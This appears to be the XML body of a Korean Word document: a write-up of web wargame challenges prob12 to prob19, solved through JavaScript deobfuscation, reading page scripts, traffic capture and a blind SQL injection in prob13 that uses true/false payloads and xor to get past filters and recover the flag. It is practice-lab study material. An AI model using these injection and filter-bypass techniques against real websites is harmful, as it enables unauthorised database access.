        </w:rPr>
        <w:t>표현된다.</w:t>
      </w:r>
      <w:r w:rsidR="00D216CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D216CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D216CA" w:rsidRDefault="00D216CA" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE679CD" wp14:editId="1054AE79">
            <wp:extent cx="4591050" cy="2657475"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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CA" w:rsidRPr="00D216CA" w:rsidRDefault="00D216CA" w:rsidP="00D216CA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D216CA">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D216CA">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D216CA" w:rsidRDefault="00337D91" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F4D3466" wp14:editId="30F60637">
            <wp:extent cx="5731510" cy="1217930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SCII, UNICODE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등의 숫자 형태의 문자들을 S</w:t>
      </w:r>
      <w:r>
        <w:t>tring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 다시 가져오는 함수이다. 이를 다시 되돌리자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337D91" w:rsidRDefault="00337D91" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44822D7E" wp14:editId="77ED7815">
            <wp:extent cx="5731510" cy="44259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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>되돌리면 밑 사진처럼 코드가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337D91" w:rsidRDefault="00337D91" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC6E9D1" wp14:editId="56FE3910">
            <wp:extent cx="5731510" cy="213360"/>
            <wp:effectExtent l="0" t="0" r="254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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406CF711" wp14:editId="37C48579">
            <wp:extent cx="5731510" cy="2148205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문의 조건을 충족하면 p</w:t>
      </w:r>
      <w:r>
        <w:t>assword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 출력하니 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocument.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 조건식을 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해주자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337D91" w:rsidRDefault="00337D91" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EBCE130" wp14:editId="203D1BB0">
            <wp:extent cx="2371725" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="9525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좀 허무하지만 코드를 얻을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337D91" w:rsidRDefault="00337D91" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 이 값을 넣어야 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidR="005D7AF8">
        <w:t>‘=’</w:t>
      </w:r>
      <w:r w:rsidR="005D7AF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 기준으로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 문자열을 </w:t>
      </w:r>
      <w:r w:rsidR="005D7AF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>얻고 있으므로</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337D91" w:rsidRDefault="005D7AF8" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18366FFF" wp14:editId="0F6C6E2B">
            <wp:extent cx="4724400" cy="1657350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8" w:rsidRPr="005D7AF8" w:rsidRDefault="005D7AF8" w:rsidP="005D7AF8">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D7AF8">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005D7AF8">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D7AF8" w:rsidRDefault="005D7AF8" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A8E251" wp14:editId="2B0712BF">
            <wp:extent cx="2228850" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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8" w:rsidRDefault="005D7AF8" w:rsidP="002F582E">
      <w:r>
        <w:t xml:space="preserve">SQL INJECTION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741A15" w:rsidRDefault="00741A15" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">버프 수트를 못쓰는 관계로 손으로 필터링을 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>검사했다.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA1AF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00BA1AF2">
        <w:t xml:space="preserve">imit, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">like, %20, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">… </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">등 필터링이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>아주 많아 보인다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AF2" w:rsidRDefault="00BA1AF2" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35B9EA4C" wp14:editId="3E8C5FEF">
            <wp:extent cx="5695950" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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</w:t>
      </w:r>
      <w:r>
        <w:t>o = 1 or 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 참 구문을 만들었을 때,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resul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나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AF2" w:rsidRDefault="00BA1AF2" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC26964" wp14:editId="2EAC74DB">
            <wp:extent cx="5731510" cy="1976755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>o = 0 and 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 거짓 구문을 만들었을 때,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resul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 xml:space="preserve">블라인드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가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AF2" w:rsidRDefault="00BA1AF2" w:rsidP="002F582E">
      <w:r>
        <w:t>like, =</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">등 비교 구문이 필터링 되어 있으므로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 사용해서 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flag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의 데이터 개수를 알아보겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1AF2" w:rsidRDefault="00BA1AF2" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EA8A739" wp14:editId="170C6832">
            <wp:extent cx="5731510" cy="2779395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="367EA6B7" wp14:editId="6B039932">
            <wp:extent cx="1504950" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 두 개가 있으므로 m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ax(count), </w:t>
      </w:r>
      <w:r w:rsidR="00901E49">
        <w:t>min(count)</w:t>
      </w:r>
      <w:r w:rsidR="00901E49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 나누어 길이를 검사하도록 하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901E49" w:rsidRDefault="00901E49" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B77265" wp14:editId="57997E1E">
            <wp:extent cx="1333500" cy="118110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49" w:rsidRDefault="00901E49" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00276513" wp14:editId="4ED1BADC">
            <wp:extent cx="1257300" cy="4381500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49" w:rsidRDefault="00901E49" w:rsidP="002F582E">
      <w:r>
        <w:t>length(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ax(flag)): 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526CAB" w:rsidRDefault="00901E49" w:rsidP="002F582E">
      <w:r>
        <w:t>length(min(flag)): 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450104" w:rsidRDefault="00450104" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71766730" wp14:editId="6B301272">
            <wp:extent cx="1238250" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="0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04" w:rsidRDefault="00450104" w:rsidP="002F582E">
      <w:r>
        <w:t>max(flag) = ‘flag’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5647C3BB" wp14:editId="44A56AFA">
            <wp:extent cx="2133600" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="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t>min(flag) = ‘challenge13luckclear’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45C0D722" wp14:editId="6BA84AEE">
            <wp:extent cx="4381500" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="0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04" w:rsidRPr="00516475" w:rsidRDefault="00450104" w:rsidP="00450104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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450104" w:rsidRDefault="00450104" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C64562" wp14:editId="7A764E31">
            <wp:extent cx="2171700" cy="1238250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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">덩그러니 입력 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>창 뿐이다</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450104" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E6447C" wp14:editId="44BE3DB7">
            <wp:extent cx="5591175" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocument.URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">index </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>위치를 찾아 3</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 곱한 값을 입력하면 되므로</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B1C4D92" wp14:editId="369ECE64">
            <wp:extent cx="1981200" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FE218E6" wp14:editId="6B91B9CC">
            <wp:extent cx="5731510" cy="1079500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00516475">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="00516475">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F5C8019" wp14:editId="1F26B73D">
            <wp:extent cx="2847975" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="9525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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lag is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>off_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>페이지에 들어가자 마자 나와지므로 f</w:t>
      </w:r>
      <w:r>
        <w:t>iddler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 h</w:t>
      </w:r>
      <w:r>
        <w:t>ttp data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 잡아보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265049B9" wp14:editId="351185C2">
            <wp:extent cx="4057650" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="95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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9051AB" wp14:editId="1D9A7C2C">
            <wp:extent cx="676275" cy="666750"/>
            <wp:effectExtent l="0" t="0" r="9525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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D114CAA" wp14:editId="3C23F1A0">
            <wp:extent cx="5731510" cy="2879725"/>
            <wp:effectExtent l="0" t="0" r="254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820856" w:rsidP="002F582E">
      <w:r>
        <w:t>cd == 124</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ocation.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 해준다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 124</w:t>
      </w:r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e</w:t>
      </w:r>
      <w:r>
        <w:t>vent.keyCode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즉 우리가 누른 문자의 </w:t>
      </w:r>
      <w:r>
        <w:t>ASCII code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이다. </w:t>
      </w:r>
      <w:r>
        <w:t>124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 </w:t>
      </w:r>
      <w:r>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516475" w:rsidRDefault="00516475" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750EC5E1" wp14:editId="33F5C78A">
            <wp:extent cx="1466850" cy="285750"/>
            <wp:effectExtent l="0" t="0" r="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rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00820856">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob 17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5284E690" wp14:editId="4890C6DE">
            <wp:extent cx="2028825" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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>이젠 익숙한 그저 텍스트 폼 하나.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4645BB93" wp14:editId="13F31D8D">
            <wp:extent cx="5731510" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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 xml:space="preserve">계산해서 </w:t>
      </w:r>
      <w:r>
        <w:t>pw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변수에 집어넣으면 풀린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B7D203" wp14:editId="57C01FE8">
            <wp:extent cx="5731510" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="254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43BA2DC7" wp14:editId="77F562E6">
            <wp:extent cx="1495425" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="952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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DC82850" wp14:editId="41F9558A">
            <wp:extent cx="2238375" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="9525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눌러보자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7658B5C0" wp14:editId="7E1A8DC1">
            <wp:extent cx="5731510" cy="5372735"/>
            <wp:effectExtent l="0" t="0" r="254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 xml:space="preserve">딱히 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>크리티컬한</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 것은 필터링 하고 있지 않다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A593EBF" wp14:editId="27CF3564">
            <wp:extent cx="3838575" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prob19</w:t>
